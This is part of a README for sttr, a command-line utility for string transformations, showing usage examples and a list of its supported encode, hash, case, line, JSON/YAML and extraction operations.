  • Working with help.
sttr -h

// Example
sttr zeropad -h
sttr md5 -h
  • Working with files input.
sttr {command-name} {filename}

sttr base64-encode image.jpg
sttr md5 file.txt
sttr md-html Readme.md
  • Writing output to file.
sttr yaml-json file.yaml > file-output.json
  • Taking input from other command.
curl https: //jsonplaceholder.typicode.com/users | sttr json-yaml
  • Chaining the different processor.
sttr md5 hello | sttr base64-encode

echo "Hello World" | sttr base64-encode | sttr md5

:boom: Supported Operations

Encode/Decode

  • [x] ascii85-encode - Encode your text to ascii85
  • [x] ascii85-decode - Decode your ascii85 text
  • [x] base32-decode - Decode your base32 text
  • [x] base32-encode - Encode your text to base32
  • [x] base64-decode - Decode your base64 text
  • [x] base64-encode - Encode your text to base64
  • [x] base85-encode - Encode your text to base85
  • [x] base85-decode - Decode your base85 text
  • [x] base64url-decode - Decode your base64 url
  • [x] base64url-encode - Encode your text to url
  • [x] html-decode - Unescape your HTML
  • [x] html-encode - Escape your HTML
  • [x] rot13-encode - Encode your text to ROT13
  • [x] url-decode - Decode URL entities
  • [x] url-encode - Encode URL entities

Hash

  • [x] bcrypt - Get the Bcrypt hash of your text
  • [x] md5 - Get the MD5 checksum of your text
  • [x] sha1 - Get the SHA1 checksum of your text
  • [x] sha256 - Get the SHA256 checksum of your text
  • [x] sha512 - Get the SHA512 checksum of your text

String

  • [x] camel - Transform your text to CamelCase
  • [x] kebab - Transform your text to kebab-case
  • [x] lower - Transform your text to lower case
  • [x] reverse - Reverse Text ( txeT esreveR )
  • [x] slug - Transform your text to slug-case
  • [x] snake - Transform your text to snake_case
  • [x] title - Transform your text to Title Case
  • [x] upper - Transform your text to UPPER CASE

Lines

  • [x] count-lines - Count the number of lines in your text
  • [x] reverse-lines - Reverse lines
  • [x] shuffle-lines - Shuffle lines randomly
  • [x] sort-lines - Sort lines alphabetically
  • [x] unique-lines - Get unique lines from list

Spaces

  • [x] remove-spaces - Remove all spaces + new lines
  • [x] remove-newlines - Remove all new lines

Count

  • [x] count-chars - Find the length of your text (including spaces)
  • [x] count-lines - Count the number of lines in your text
  • [x] count-words - Count the number of words in your text

RGB/Hex

  • [x] hex-rgb - Convert a #hex-color code to RGB
  • [x] hex-encode - Encode your text Hex
  • [x] hex-decode - Convert Hexadecimal to String

JSON

  • [x] json - Format your text as JSON
  • [x] json-escape - JSON Escape
  • [x] json-unescape - JSON Unescape
  • [x] json-yaml - Convert JSON to YAML text
  • [x] json-msgpack - Convert JSON to MSGPACK
  • [x] msgpack-json - Convert MSGPACK to JSON

YAML

  • [x] yaml-json - Convert YAML to JSON text

Markdown

  • [x] markdown-html - Convert Markdown to HTML

Extract

  • [x] extract-emails - Extract emails from given text
  • [x] extract-ip - Extract IPv4 and IPv6 from your text
  • [x] extract-urls - Extract URls your text ( we don't do ping check )

Other

  • [x] escape-quotes - escape single and double quotes from your text
  • [x] completion - generate the autocompletion script for the specified shell
  • [x] interactive - Use sttr in interactive mode
  • [x] version - Print the version of sttr
  • [x] zeropad - Pad a number with zeros
  • [x] and adding more....

Featured On

These are the few locations where sttr was highlighted, many thanks to all of you. Please feel free to add any blogs/videos you may have made that discuss sttr to the list.



❌
❌